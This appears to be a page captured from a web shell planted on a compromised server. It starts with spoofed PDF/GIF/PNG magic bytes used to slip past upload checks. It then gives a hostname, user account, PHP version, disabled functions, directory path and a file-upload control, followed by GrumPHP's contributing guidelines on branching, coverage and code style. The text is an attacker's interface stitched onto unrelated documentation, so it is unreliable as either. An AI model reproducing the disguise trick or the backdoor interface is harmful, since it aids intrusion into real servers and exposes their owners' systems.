%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/public_html/admin1/vendor/phpro/grumphp/ |
Upload File : |
# Contributing GrumPHP is an open source, community-driven project. If you'd like to contribute, feel free to do this, but remember to follow this few simple rules: ## Branching strategy - __Always__ base your changes on the `master` branch (all new development happens here), - When you create Pull Request, always select `master` branch as target, otherwise it will be closed (this is selected by default). ## Coverage - All classes that interact solely with the core logic should be covered by Specs - Any infrastructure adaptors should be covered by integration tests using PHPUnit - All features should be covered with .feature descriptions automated with Behat ## Code style / Formatting - All new classes must carry the standard copyright notice docblock - All code in the `src` folder must follow the PSR-2 standard